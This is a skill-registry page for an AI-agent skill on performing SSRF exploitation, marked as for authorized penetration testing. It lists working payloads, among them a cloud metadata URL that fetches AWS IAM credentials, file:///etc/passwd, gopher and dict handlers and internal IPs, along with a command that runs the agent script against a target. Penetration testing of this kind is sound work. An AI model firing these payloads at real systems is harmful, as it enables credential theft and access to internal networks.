skills/mukul975/anthropic-cybersecurity-skills/performing-ssrf-vulnerability-exploitation

performing-ssrf-vulnerability-exploitation

SKILL.md

Instructions

  1. Install dependencies: pip install requests
  2. Identify URL parameters in the target application that accept URLs or hostnames.
  3. Test SSRF payloads:
    • Cloud metadata: http://169.254.169.254/latest/meta-data/
    • Internal services: http://127.0.0.1:port/, http://10.0.0.1/
    • Protocol handlers: file:///etc/passwd, gopher://, dict://
    • Bypass techniques: IP encoding, DNS rebinding, URL redirects
  4. Analyze responses for information disclosure or internal access confirmation.
  5. Generate a vulnerability assessment report.
# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json

Examples

AWS Metadata SSRF

GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.

Weekly Installs
3
GitHub Stars
2.4K
First Seen
3 days ago
Installed on
amp3
cline3
opencode3
cursor3
kimi-cli3
codex3